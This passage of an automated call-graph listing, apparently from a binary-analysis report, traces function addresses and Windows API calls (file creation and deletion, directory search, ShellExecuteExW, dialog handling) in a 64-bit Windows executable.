GetWindowRect GetClientRect 26224->26225 26225->26198 26225->26199 26227 7ff7e1db129c 33 API calls 26226->26227 26236 7ff7e1dc955a 26226->26236 26228 7ff7e1dc949c 26227->26228 26229 7ff7e1dc95a1 26228->26229 26231 7ff7e1db129c 33 API calls 26228->26231 26230 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26229->26230 26232 7ff7e1dc95a7 26230->26232 26233 7ff7e1dc9514 26231->26233 26234 7ff7e1dc959c 26233->26234 26233->26236 26235 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26234->26235 26235->26229 26236->26224 26238 7ff7e1dc9840 26237->26238 26240 7ff7e1dc9869 26237->26240 26289 7ff7e1dea270 31 API calls 2 library calls 26238->26289 26240->26211 26242 7ff7e1dc3e28 swprintf 46 API calls 26241->26242 26243 7ff7e1dc95eb 26242->26243 26244 7ff7e1dd0f68 WideCharToMultiByte 26243->26244 26245 7ff7e1dc9603 26244->26245 26246 7ff7e1dc9800 31 API calls 26245->26246 26247 7ff7e1dc961b 26246->26247 26248 7ff7e1de2320 _handle_error 8 API calls 26247->26248 26249 7ff7e1dc962b 26248->26249 26249->26199 26249->26210 26251 7ff7e1de9f36 26250->26251 26252 7ff7e1de9f4e 26250->26252 26277 7ff7e1ded69c 15 API calls abort 26251->26277 26252->26251 26253 7ff7e1de9f58 26252->26253 26279 7ff7e1de7ef0 35 API calls 2 library calls 26253->26279 26256 7ff7e1de9f3b 26278 7ff7e1de78e4 31 API calls _invalid_parameter_noinfo_noreturn 26256->26278 26258 7ff7e1de9f69 memcpy_s 26280 7ff7e1de7e70 15 API calls memcpy_s 26258->26280 26259 7ff7e1de2320 _handle_error 8 API calls 26260 7ff7e1dc3e69 26259->26260 26260->26220 26262 7ff7e1de9fd4 26281 7ff7e1de82f8 46 API calls 3 library calls 26262->26281 26264 7ff7e1de9fdd 26265 7ff7e1de9fe5 26264->26265 26267 7ff7e1dea014 26264->26267 26282 7ff7e1ded90c 26265->26282 26268 7ff7e1dea06c 26267->26268 26269 7ff7e1dea023 26267->26269 26270 7ff7e1dea092 26267->26270 26271 7ff7e1dea01a 26267->26271 26274 7ff7e1ded90c __free_lconv_mon 15 API calls 26268->26274 26273 7ff7e1ded90c __free_lconv_mon 15 API calls 26269->26273 26270->26268 26272 7ff7e1dea09c 26270->26272 26271->26268 26271->26269 26275 7ff7e1ded90c __free_lconv_mon 15 API calls 26272->26275 26276 7ff7e1de9f46 26273->26276 26274->26276 26275->26276 26276->26259 26277->26256 26278->26276 26279->26258 26280->26262 26281->26264 26283 7ff7e1ded911 RtlRestoreThreadPreferredUILanguages 26282->26283 26287 7ff7e1ded941 __free_lconv_mon 26282->26287 26284 7ff7e1ded92c 26283->26284 26283->26287 26288 7ff7e1ded69c 15 API calls abort 26284->26288 26286 7ff7e1ded931 GetLastError 26286->26287 26287->26276 26288->26286 26289->26240 26302 7ff7e1db13a4 26290->26302 26293 7ff7e1db2494 26294 7ff7e1db129c 33 API calls 26293->26294 26295 7ff7e1db24a2 26294->26295 26296 7ff7e1db24dd 26295->26296 26298 7ff7e1db2505 26295->26298 26297 7ff7e1de2320 _handle_error 8 API calls 26296->26297 26299 7ff7e1db24f3 26297->26299 26300 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26298->26300 26299->25815 26301 7ff7e1db250a 26300->26301 26303 7ff7e1db13ad 26302->26303 26311 7ff7e1db142d GetWindowTextW 26302->26311 26304 7ff7e1db143d 26303->26304 26305 7ff7e1db13ce 26303->26305 26322 7ff7e1db2018 33 API calls std::_Xinvalid_argument 26304->26322 26309 7ff7e1db13db memcpy_s 26305->26309 26312 7ff7e1de21d0 26305->26312 26321 7ff7e1db197c 31 API calls _invalid_parameter_noinfo_noreturn 26309->26321 26311->26293 26314 7ff7e1de21db 26312->26314 26313 7ff7e1de21f4 26313->26309 26314->26313 26316 7ff7e1de21fa 26314->26316 26323 7ff7e1debbc0 26314->26323 26319 7ff7e1de2205 26316->26319 26326 7ff7e1de2f7c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26316->26326 26327 7ff7e1db1f80 33 API calls 3 library calls 26319->26327 26320 7ff7e1de220b 26321->26311 26328 7ff7e1debc00 26323->26328 26326->26319 26327->26320 26333 7ff7e1def398 EnterCriticalSection 26328->26333 26334->25826 26336->25840 26344 7ff7e1dc9638 26337->26344 26340 7ff7e1dc97d9 26342 7ff7e1de2320 _handle_error 8 API calls 26340->26342 26341 7ff7e1dc9800 31 API calls 26341->26340 26343 7ff7e1dc97f2 26342->26343 26343->25852 26343->25853 26345 7ff7e1dc9692 26344->26345 26346 7ff7e1dc9730 26344->26346 26347 7ff7e1dd0f68 WideCharToMultiByte 26345->26347 26350 7ff7e1dc96c0 26345->26350 26348 7ff7e1de2320 _handle_error 8 API calls 26346->26348 26347->26350 26349 7ff7e1dc9764 26348->26349 26349->26340 26349->26341 26353 7ff7e1dc96ef 26350->26353 26354 7ff7e1dcaa88 45 API calls _snwprintf 26350->26354 26355 7ff7e1dea270 31 API calls 2 library calls 26353->26355 26354->26353 26355->26346 26372 7ff7e1dcd4d0 26356->26372 26360 7ff7e1de9ef0 swprintf 46 API calls 26361 7ff7e1dcd8e5 _snwprintf 26360->26361 26361->26360 26369 7ff7e1dcd974 26361->26369 26386 7ff7e1db9d78 33 API calls 26361->26386 26363 7ff7e1dcda17 26364 7ff7e1de2320 _handle_error 8 API calls 26363->26364 26366 7ff7e1dcda2b 26364->26366 26365 7ff7e1dcda3f 26367 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26365->26367 26366->25858 26368 7ff7e1dcda44 26367->26368 26370 7ff7e1dcd9a3 26369->26370 26387 7ff7e1db9d78 33 API calls 26369->26387 26370->26363 26370->26365 26373 7ff7e1dcd665 26372->26373 26375 7ff7e1dcd502 26372->26375 26376 7ff7e1dccb80 26373->26376 26374 7ff7e1db1744 33 API calls 26374->26375 26375->26373 26375->26374 26377 7ff7e1dccbb6 26376->26377 26384 7ff7e1dccc80 26376->26384 26380 7ff7e1dccc20 26377->26380 26381 7ff7e1dccc7b 26377->26381 26383 7ff7e1dccbc6 26377->26383 26380->26383 26385 7ff7e1de21d0 33 API calls 26380->26385 26388 7ff7e1db1f80 33 API calls 3 library calls 26381->26388 26383->26361 26389 7ff7e1db2004 33 API calls std::_Xinvalid_argument 26384->26389 26385->26383 26386->26361 26387->26370 26388->26384 26391 7ff7e1ddae80 GetDlgItem 26390->26391 26392 7ff7e1ddae3c GetMessageW 26390->26392 26391->25861 26391->25862 26393 7ff7e1ddae5b IsDialogMessageW 26392->26393 26394 7ff7e1ddae6a TranslateMessage DispatchMessageW 26392->26394 26393->26391 26393->26394 26394->26391 26396 7ff7e1dc36b3 26395->26396 26397 7ff7e1dc36e0 26396->26397 26398 7ff7e1dc36cc CreateDirectoryW 26396->26398 26415 7ff7e1dc32bc 26397->26415 26398->26397 26400 7ff7e1dc377d 26398->26400 26402 7ff7e1dc378d 26400->26402 26502 7ff7e1dc3d34 26400->26502 26406 7ff7e1de2320 _handle_error 8 API calls 26402->26406 26403 7ff7e1dc3791 GetLastError 26403->26402 26408 7ff7e1dc37b9 26406->26408 26408->25880 26409 7ff7e1dc3720 CreateDirectoryW 26410 7ff7e1dc373b 26409->26410 26411 7ff7e1dc3774 26410->26411 26412 7ff7e1dc37ce 26410->26412 26411->26400 26411->26403 26413 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26412->26413 26414 7ff7e1dc37d3 26413->26414 26416 7ff7e1dc32e4 26415->26416 26417 7ff7e1dc32e7 GetFileAttributesW 26415->26417 26416->26417 26418 7ff7e1dc32f8 26417->26418 26425 7ff7e1dc3375 26417->26425 26419 7ff7e1dc6a0c 49 API calls 26418->26419 26421 7ff7e1dc331f 26419->26421 26420 7ff7e1de2320 _handle_error 8 API calls 26422 7ff7e1dc3389 26420->26422 26423 7ff7e1dc3323 GetFileAttributesW 26421->26423 26424 7ff7e1dc333c 26421->26424 26422->26403 26429 7ff7e1dc6a0c 26422->26429 26423->26424 26424->26425 26426 7ff7e1dc3399 26424->26426 26425->26420 26427 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26426->26427 26428 7ff7e1dc339e 26427->26428 26430 7ff7e1dc6a4b 26429->26430 26452 7ff7e1dc6a44 26429->26452 26432 7ff7e1db129c 33 API calls 26430->26432 26431 7ff7e1de2320 _handle_error 8 API calls 26433 7ff7e1dc371c 26431->26433 26434 7ff7e1dc6a76 26432->26434 26433->26409 26433->26410 26435 7ff7e1dc6a96 26434->26435 26436 7ff7e1dc6cc7 26434->26436 26438 7ff7e1dc6ab0 26435->26438 26461 7ff7e1dc6b49 26435->26461 26437 7ff7e1dc62dc 35 API calls 26436->26437 26440 7ff7e1dc6ce6 26437->26440 26439 7ff7e1dc70ab 26438->26439 26516 7ff7e1dbc098 33 API calls 2 library calls 26438->26516 26524 7ff7e1db2004 33 API calls std::_Xinvalid_argument 26439->26524 26441 7ff7e1dc6eef 26440->26441 26443 7ff7e1dc6d1b 26440->26443 26450 7ff7e1dc6b44 26440->26450 26446 7ff7e1dc70cf 26441->26446 26521 7ff7e1dbc098 33 API calls 2 library calls 26441->26521 26448 7ff7e1dc70bd 26443->26448 26519 7ff7e1dbc098 33 API calls 2 library calls 26443->26519 26444 7ff7e1dc70b1 26458 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26444->26458 26527 7ff7e1db2004 33 API calls std::_Xinvalid_argument 26446->26527 26525 7ff7e1db2004 33 API calls std::_Xinvalid_argument 26448->26525 26449 7ff7e1dc70d5 26459 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26449->26459 26450->26444 26450->26449 26450->26452 26454 7ff7e1dc70a6 26450->26454 26452->26431 26453 7ff7e1dc6b03 26462 7ff7e1db1fa0 31 API calls 26453->26462 26469 7ff7e1dc6b15 BuildCatchObjectHelperInternal 26453->26469 26466 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26454->26466 26455 7ff7e1dc6f56 26522 7ff7e1db11cc 33 API calls BuildCatchObjectHelperInternal 26455->26522 26467 7ff7e1dc70b7 26458->26467 26460 7ff7e1dc70db 26459->26460 26473 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26460->26473 26461->26450 26468 7ff7e1db129c 33 API calls 26461->26468 26462->26469 26464 7ff7e1dc70c3 26476 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26464->26476 26465 7ff7e1db1fa0 31 API calls 26465->26450 26466->26439 26471 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26467->26471 26474 7ff7e1dc6bbe 26468->26474 26469->26465 26470 7ff7e1dc6f69 26523 7ff7e1dc57ac 33 API calls BuildCatchObjectHelperInternal 26470->26523 26471->26448 26472 7ff7e1db1fa0 31 API calls 26477 7ff7e1dc6df5 26472->26477 26478 7ff7e1dc70e1 26473->26478 26517 7ff7e1dc5820 33 API calls 26474->26517 26480 7ff7e1dc70c9 26476->26480 26489 7ff7e1dc6e21 26477->26489 26520 7ff7e1db1744 33 API calls 4 library calls 26477->26520 26526 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 26480->26526 26481 7ff7e1dc6d76 BuildCatchObjectHelperInternal 26481->26464 26481->26472 26482 7ff7e1dc6bd3 26518 7ff7e1dbe164 33 API calls 2 library calls 26482->26518 26483 7ff7e1dc6f79 BuildCatchObjectHelperInternal 26483->26460 26484 7ff7e1db1fa0 31 API calls 26483->26484 26487 7ff7e1dc6fec 26484->26487 26488 7ff7e1db1fa0 31 API calls 26487->26488 26491 7ff7e1dc6ff6 26488->26491 26489->26480 26495 7ff7e1db129c 33 API calls 26489->26495 26490 7ff7e1db1fa0 31 API calls 26493 7ff7e1dc6c6d 26490->26493 26494 7ff7e1db1fa0 31 API calls 26491->26494 26497 7ff7e1db1fa0 31 API calls 26493->26497 26494->26450 26498 7ff7e1dc6ec2 26495->26498 26496 7ff7e1dc6be9 BuildCatchObjectHelperInternal 26496->26467 26496->26490 26497->26450 26499 7ff7e1db2034 33 API calls 26498->26499 26500 7ff7e1dc6edf 26499->26500 26501 7ff7e1db1fa0 31 API calls 26500->26501 26501->26450 26503 7ff7e1dc3d5e SetFileAttributesW 26502->26503 26504 7ff7e1dc3d5b 26502->26504 26505 7ff7e1dc3d74 26503->26505 26506 7ff7e1dc3df5 26503->26506 26504->26503 26508 7ff7e1dc6a0c 49 API calls 26505->26508 26507 7ff7e1de2320 _handle_error 8 API calls 26506->26507 26509 7ff7e1dc3e0a 26507->26509 26510 7ff7e1dc3d99 26508->26510 26509->26402 26511 7ff7e1dc3d9d SetFileAttributesW 26510->26511 26512 7ff7e1dc3dbc 26510->26512 26511->26512 26512->26506 26513 7ff7e1dc3e1a 26512->26513 26514 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26513->26514 26515 7ff7e1dc3e1f 26514->26515 26516->26453 26517->26482 26518->26496 26519->26481 26520->26489 26521->26455 26522->26470 26523->26483 26526->26446 26529 7ff7e1db7206 26528->26529 26530 7ff7e1db713b 26528->26530 26538 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 26529->26538 26536 7ff7e1db714b BuildCatchObjectHelperInternal 26530->26536 26537 7ff7e1db3f48 33 API calls 2 library calls 26530->26537 26533 7ff7e1db7273 26533->25896 26534 7ff7e1db720b 26534->26533 26539 7ff7e1db889c 8 API calls BuildCatchObjectHelperInternal 26534->26539 26536->25896 26537->26536 26538->26534 26539->26534 26541 7ff7e1dc20ea 26540->26541 26542 7ff7e1dc2102 26540->26542 26541->26542 26544 7ff7e1dc20f6 FindCloseChangeNotification 26541->26544 26543 7ff7e1dc2126 26542->26543 26546 7ff7e1dbb544 99 API calls 26542->26546 26543->25921 26544->26542 26546->26543 26548 7ff7e1ddaa2f 26547->26548 26549 7ff7e1ddaa36 26547->26549 26548->26067 26549->26548 26687 7ff7e1db1744 33 API calls 4 library calls 26549->26687 26551->26067 26553 7ff7e1dda47f 26552->26553 26554 7ff7e1dda706 26552->26554 26688 7ff7e1ddcdf8 33 API calls 26553->26688 26556 7ff7e1de2320 _handle_error 8 API calls 26554->26556 26558 7ff7e1dda717 26556->26558 26557 7ff7e1dda49e 26559 7ff7e1db129c 33 API calls 26557->26559 26558->26005 26560 7ff7e1dda4de 26559->26560 26561 7ff7e1db129c 33 API calls 26560->26561 26562 7ff7e1dda517 26561->26562 26563 7ff7e1db129c 33 API calls 26562->26563 26564 7ff7e1dda54a 26563->26564 26689 7ff7e1dda834 33 API calls _invalid_parameter_noinfo_noreturn 26564->26689 26566 7ff7e1dda734 26568 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26566->26568 26567 7ff7e1dda573 26567->26566 26569 7ff7e1dda73a 26567->26569 26570 7ff7e1dda740 26567->26570 26573 7ff7e1db20b0 33 API calls 26567->26573 26574 7ff7e1dda685 26567->26574 26568->26569 26571 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26569->26571 26572 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26570->26572 26571->26570 26575 7ff7e1dda746 26572->26575 26573->26574 26574->26554 26574->26575 26576 7ff7e1dda72f 26574->26576 26577 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26575->26577 26579 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26576->26579 26578 7ff7e1dda74c 26577->26578 26580 7ff7e1db255c 61 API calls 26578->26580 26579->26566 26581 7ff7e1dda795 26580->26581 26582 7ff7e1dda7b1 26581->26582 26583 7ff7e1dda801 SetDlgItemTextW 26581->26583 26587 7ff7e1dda7a1 26581->26587 26584 7ff7e1de2320 _handle_error 8 API calls 26582->26584 26583->26582 26585 7ff7e1dda827 26584->26585 26585->26005 26586 7ff7e1dda7ad 26586->26582 26588 7ff7e1dda7b7 EndDialog 26586->26588 26587->26582 26587->26586 26690 7ff7e1dcbb00 102 API calls 26587->26690 26588->26582 26595 7ff7e1ddf529 memcpy_s 26590->26595 26606 7ff7e1ddf87d 26590->26606 26591 7ff7e1db1fa0 31 API calls 26592 7ff7e1ddf89c 26591->26592 26593 7ff7e1de2320 _handle_error 8 API calls 26592->26593 26594 7ff7e1ddf8a8 26593->26594 26594->26008 26596 7ff7e1ddf684 26595->26596 26691 7ff7e1dd13c4 CompareStringW 26595->26691 26598 7ff7e1db129c 33 API calls 26596->26598 26599 7ff7e1ddf6c0 26598->26599 26600 7ff7e1dc32a8 51 API calls 26599->26600 26601 7ff7e1ddf6ca 26600->26601 26602 7ff7e1db1fa0 31 API calls 26601->26602 26605 7ff7e1ddf6d5 26602->26605 26603 7ff7e1ddf742 ShellExecuteExW 26604 7ff7e1ddf846 26603->26604 26611 7ff7e1ddf755 26603->26611 26604->26606 26609 7ff7e1ddf8fb 26604->26609 26605->26603 26608 7ff7e1db129c 33 API calls 26605->26608 26606->26591 26607 7ff7e1ddf78e 26693 7ff7e1ddfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26607->26693 26612 7ff7e1ddf717 26608->26612 26613 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26609->26613 26610 7ff7e1ddf7e3 CloseHandle 26614 7ff7e1ddf801 26610->26614 26615 7ff7e1ddf7f2 26610->26615 26611->26607 26611->26610 26620 7ff7e1ddf781 ShowWindow 26611->26620 26692 7ff7e1dc5b60 53 API calls 2 library calls 26612->26692 26618 7ff7e1ddf900 26613->26618 26614->26604 26625 7ff7e1ddf837 ShowWindow 26614->26625 26694 7ff7e1dd13c4 CompareStringW 26615->26694 26617 7ff7e1ddf725 26623 7ff7e1db1fa0 31 API calls 26617->26623 26620->26607 26622 7ff7e1ddf7a6 26622->26610 26626 7ff7e1ddf7b4 GetExitCodeProcess 26622->26626 26624 7ff7e1ddf72f 26623->26624 26624->26603 26625->26604 26626->26610 26627 7ff7e1ddf7c7 26626->26627 26627->26610 26628->26067 26629->26067 26630->26067 26631->26067 26632->26067 26633->26067 26634->26067 26635->26067 26636->26067 26637->26067 26639 7ff7e1dc72ea 26638->26639 26695 7ff7e1dbb3a8 26639->26695 26642->26067 26644 7ff7e1dc31e4 26643->26644 26645 7ff7e1dc31e7 DeleteFileW 26643->26645 26644->26645 26646 7ff7e1dc327c 26645->26646 26647 7ff7e1dc31fd 26645->26647 26648 7ff7e1de2320 _handle_error 8 API calls 26646->26648 26649 7ff7e1dc6a0c 49 API calls 26647->26649 26651 7ff7e1dc3291 26648->26651 26650 7ff7e1dc3222 26649->26650 26652 7ff7e1dc3226 DeleteFileW 26650->26652 26653 7ff7e1dc3243 26650->26653 26651->26067 26652->26653 26653->26646 26654 7ff7e1dc32a1 26653->26654 26655 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26654->26655 26656 7ff7e1dc32a6 26655->26656 26658->26067 26659->26067 26660->26067 26661->26067 26663 7ff7e1dc7e0c 26662->26663 26664 7ff7e1dc7e55 26663->26664 26665 7ff7e1dc7e23 26663->26665 26699 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 26664->26699 26667 7ff7e1db129c 33 API calls 26665->26667 26669 7ff7e1dc7e47 26667->26669 26668 7ff7e1dc7e5a 26669->26067 26670->26067 26671->26067 26674 7ff7e1dcd25e 26672->26674 26673 7ff7e1dcd292 26673->26059 26674->26673 26675 7ff7e1db1744 33 API calls 26674->26675 26675->26674 26676->25960 26677->25950 26679->25930 26680->25933 26681->25937 26682->25988 26683->25977 26685->25978 26687->26549 26688->26557 26689->26567 26690->26586 26691->26596 26692->26617 26693->26622 26694->26614 26698 7ff7e1dbb3f2 memcpy_s 26695->26698 26696 7ff7e1de2320 _handle_error 8 API calls 26697 7ff7e1dbb4b6 26696->26697 26697->26067 26698->26696 26699->26668 26756 7ff7e1dc86ec 26700->26756 26702 7ff7e1dbe3c4 26762 7ff7e1dbe600 26702->26762 26704 7ff7e1dbe4d4 26706 7ff7e1de21d0 33 API calls 26704->26706 26705 7ff7e1dbe454 26705->26704 26707 7ff7e1dbe549 26705->26707 26709 7ff7e1dbe4f0 26706->26709 26708 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26707->26708 26710 7ff7e1dbe54e 26708->26710 26768 7ff7e1dd3148 102 API calls 26709->26768 26712 7ff7e1dc190d 26710->26712 26716 7ff7e1db1fa0 31 API calls 26710->26716 26717 7ff7e1dc18c2 26710->26717 26712->26079 26713 7ff7e1dbe51d 26714 7ff7e1de2320 _handle_error 8 API calls 26713->26714 26715 7ff7e1dbe52d 26714->26715 26715->26079 26716->26710 26717->26712 26718 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26717->26718 26719 7ff7e1dc193b 26718->26719 26722 7ff7e1dbe7ea 26720->26722 26721 7ff7e1dbe8a1 26732 7ff7e1dbe900 26721->26732 26776 7ff7e1dbf578 26721->26776 26722->26721 26724 7ff7e1dbe864 26722->26724 26769 7ff7e1dc3ec8 26722->26769 26724->26721 26725 7ff7e1dbe993 26724->26725 26726 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26725->26726 26729 7ff7e1dbe998 26726->26729 26727 7ff7e1dbe955 26728 7ff7e1de2320 _handle_error 8 API calls 26727->26728 26731 7ff7e1dbe97e 26728->26731 26734 7ff7e1dbe578 26731->26734 26732->26727 26812 7ff7e1db28a4 82 API calls 2 library calls 26732->26812 27786 7ff7e1dc15d8 26734->27786 26737 7ff7e1dbe59e 26739 7ff7e1db1fa0 31 API calls 26737->26739 26738 7ff7e1dd1870 108 API calls 26738->26737 26740 7ff7e1dbe5b7 26739->26740 26741 7ff7e1db1fa0 31 API calls 26740->26741 26742 7ff7e1dbe5c3 26741->26742 26743 7ff7e1db1fa0 31 API calls 26742->26743 26744 7ff7e1dbe5cf 26743->26744 26745 7ff7e1dc878c 108 API calls 26744->26745 26746 7ff7e1dbe5db 26745->26746 26747 7ff7e1db1fa0 31 API calls 26746->26747 26748 7ff7e1dbe5e4 26747->26748 26749 7ff7e1db1fa0 31 API calls 26748->26749 26752 7ff7e1dbe5ed 26749->26752 26750 7ff7e1dc18c2 26751 7ff7e1dc190d 26750->26751 26753 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26750->26753 26751->26083 26752->26750 26752->26751 26754 7ff7e1db1fa0 31 API calls 26752->26754 26755 7ff7e1dc193b 26753->26755 26754->26752 26757 7ff7e1dc870a 26756->26757 26758 7ff7e1de21d0 33 API calls 26757->26758 26760 7ff7e1dc872f 26758->26760 26759 7ff7e1de21d0 33 API calls 26761 7ff7e1dc8759 26759->26761 26760->26759 26761->26702 26763 7ff7e1dbe627 26762->26763 26765 7ff7e1dbe62c BuildCatchObjectHelperInternal 26762->26765 26764 7ff7e1db1fa0 31 API calls 26763->26764 26764->26765 26766 7ff7e1db1fa0 31 API calls 26765->26766 26767 7ff7e1dbe668 BuildCatchObjectHelperInternal 26765->26767 26766->26767 26767->26705 26768->26713 26770 7ff7e1dc72cc 8 API calls 26769->26770 26771 7ff7e1dc3ee1 26770->26771 26772 7ff7e1dc3f0f 26771->26772 26813 7ff7e1dc40bc 26771->26813 26772->26722 26775 7ff7e1dc3efa FindClose 26775->26772 26777 7ff7e1dbf598 _snwprintf 26776->26777 26852 7ff7e1db2950 26777->26852 26782 7ff7e1dbf5cc 26784 7ff7e1dbf5fc 26782->26784 26867 7ff7e1db33e4 26782->26867 26783 7ff7e1dbf5f8 26783->26784 26899 7ff7e1db3ad8 26783->26899 27102 7ff7e1db2c54 26784->27102 26791 7ff7e1dbf7cb 26909 7ff7e1dbf8a4 26791->26909 26793 7ff7e1db8d04 33 API calls 26794 7ff7e1dbf662 26793->26794 27122 7ff7e1dc7918 48 API calls 2 library calls 26794->27122 26796 7ff7e1dbf677 26798 7ff7e1dc3ec8 55 API calls 26796->26798 26806 7ff7e1dbf6ad 26798->26806 26799 7ff7e1dbf842 26799->26784 26914 7ff7e1db69f8 26799->26914 26925 7ff7e1dbf930 26799->26925 26804 7ff7e1dbf89a 26807 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26804->26807 26805 7ff7e1dbf74d 26805->26791 26805->26804 26808 7ff7e1dbf895 26805->26808 26806->26804 26806->26805 26809 7ff7e1dc3ec8 55 API calls 26806->26809 27123 7ff7e1dc7918 48 API calls 2 library calls 26806->27123 26811 7ff7e1dbf8a0 26807->26811 26810 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26808->26810 26809->26806 26810->26804 26812->26727 26814 7ff7e1dc41d2 FindNextFileW 26813->26814 26815 7ff7e1dc40f9 FindFirstFileW 26813->26815 26817 7ff7e1dc41e1 GetLastError 26814->26817 26818 7ff7e1dc41f3 26814->26818 26815->26818 26819 7ff7e1dc411e 26815->26819 26837 7ff7e1dc41c0 26817->26837 26820 7ff7e1dc4211 26818->26820 26822 7ff7e1db20b0 33 API calls 26818->26822 26821 7ff7e1dc6a0c 49 API calls 26819->26821 26827 7ff7e1db129c 33 API calls 26820->26827 26824 7ff7e1dc4144 26821->26824 26822->26820 26823 7ff7e1de2320 _handle_error 8 API calls 26828 7ff7e1dc3ef4 26823->26828 26825 7ff7e1dc4148 FindFirstFileW 26824->26825 26826 7ff7e1dc4167 26824->26826 26825->26826 26826->26818 26830 7ff7e1dc41af GetLastError 26826->26830 26832 7ff7e1dc4314 26826->26832 26829 7ff7e1dc423b 26827->26829 26828->26772 26828->26775 26839 7ff7e1dc8090 26829->26839 26830->26837 26834 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26832->26834 26835 7ff7e1dc431a 26834->26835 26836 7ff7e1dc430f 26838 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26836->26838 26837->26823 26838->26832 26840 7ff7e1dc80a5 26839->26840 26843 7ff7e1dc8188 26840->26843 26842 7ff7e1dc4249 26842->26836 26842->26837 26844 7ff7e1dc8326 26843->26844 26848 7ff7e1dc81ba 26843->26848 26851 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 26844->26851 26846 7ff7e1dc832b 26847 7ff7e1dc81d4 BuildCatchObjectHelperInternal 26847->26842 26848->26847 26850 7ff7e1dc58a4 33 API calls 2 library calls 26848->26850 26850->26847 26851->26846 26853 7ff7e1db296c 26852->26853 26854 7ff7e1dc86ec 33 API calls 26853->26854 26855 7ff7e1db298d 26854->26855 26856 7ff7e1de21d0 33 API calls 26855->26856 26859 7ff7e1db2ac2 26855->26859 26857 7ff7e1db2ab0 26856->26857 26857->26859 27125 7ff7e1db91c8 26857->27125 27132 7ff7e1dc4d04 26859->27132 26862 7ff7e1dc2ca8 27164 7ff7e1dc24c0 26862->27164 26864 7ff7e1dc2cc5 26864->26782 27183 7ff7e1dc28d0 26867->27183 26868 7ff7e1db3674 27202 7ff7e1db28a4 82 API calls 2 library calls 26868->27202 26869 7ff7e1db3431 memcpy_s 26876 7ff7e1db344e 26869->26876 26879 7ff7e1db3601 26869->26879 27188 7ff7e1dc2bb0 26869->27188 26871 7ff7e1db69f8 132 API calls 26873 7ff7e1db3682 26871->26873 26873->26871 26874 7ff7e1db370c 26873->26874 26873->26879 26891 7ff7e1dc2aa0 101 API calls 26873->26891 26878 7ff7e1db3740 26874->26878 26874->26879 27203 7ff7e1db28a4 82 API calls 2 library calls 26874->27203 26876->26868 26876->26873 26877 7ff7e1db35cb 26877->26876 26880 7ff7e1db35d7 26877->26880 26878->26879 26883 7ff7e1db384d 26878->26883 26892 7ff7e1dc2bb0 101 API calls 26878->26892 26879->26783 26880->26879 26881 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26880->26881 26884 7ff7e1db3891 26881->26884 26882 7ff7e1db34eb 26882->26877 27197 7ff7e1dc2aa0 26882->27197 26883->26879 26885 7ff7e1db20b0 33 API calls 26883->26885 26884->26783 26885->26879 26886 7ff7e1db69f8 132 API calls 26888 7ff7e1db378e 26886->26888 26888->26886 26889 7ff7e1db3803 26888->26889 26894 7ff7e1dc2aa0 101 API calls 26888->26894 26896 7ff7e1dc2aa0 101 API calls 26889->26896 26890 7ff7e1dc28d0 104 API calls 26890->26882 26891->26873 26892->26888 26893 7ff7e1dc28d0 104 API calls 26893->26877 26894->26888 26896->26883 26900 7ff7e1db3af9 26899->26900 26906 7ff7e1db3b55 26899->26906 27215 7ff7e1db3378 26900->27215 26901 7ff7e1de2320 _handle_error 8 API calls 26903 7ff7e1db3b67 26901->26903 26903->26791 26903->26793 26905 7ff7e1db3b6c 26907 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 26905->26907 26906->26901 26908 7ff7e1db3b71 26907->26908 27438 7ff7e1dc886c 26909->27438 26912 7ff7e1dbf8ba 27442 7ff7e1dcef60 GetSystemTime SystemTimeToFileTime 26912->27442 26915 7ff7e1db6a0e 26914->26915 26920 7ff7e1db6a0a 26914->26920 26924 7ff7e1dc2bb0 101 API calls 26915->26924 26916 7ff7e1db6a1b 26917 7ff7e1db6a2f 26916->26917 26918 7ff7e1db6a3e 26916->26918 26917->26920 27451 7ff7e1db5e24 26917->27451 27513 7ff7e1db5130 130 API calls 2 library calls 26918->27513 26920->26799 26921 7ff7e1db6a3c 26921->26920 27514 7ff7e1db466c 82 API calls 26921->27514 26924->26916 26926 7ff7e1dbf978 26925->26926 26929 7ff7e1dbf9b0 26926->26929 26933 7ff7e1dbfa34 26926->26933 27629 7ff7e1dd612c 137 API calls 3 library calls 26926->27629 26928 7ff7e1dc1189 26930 7ff7e1dc11e1 26928->26930 26931 7ff7e1dc118e 26928->26931 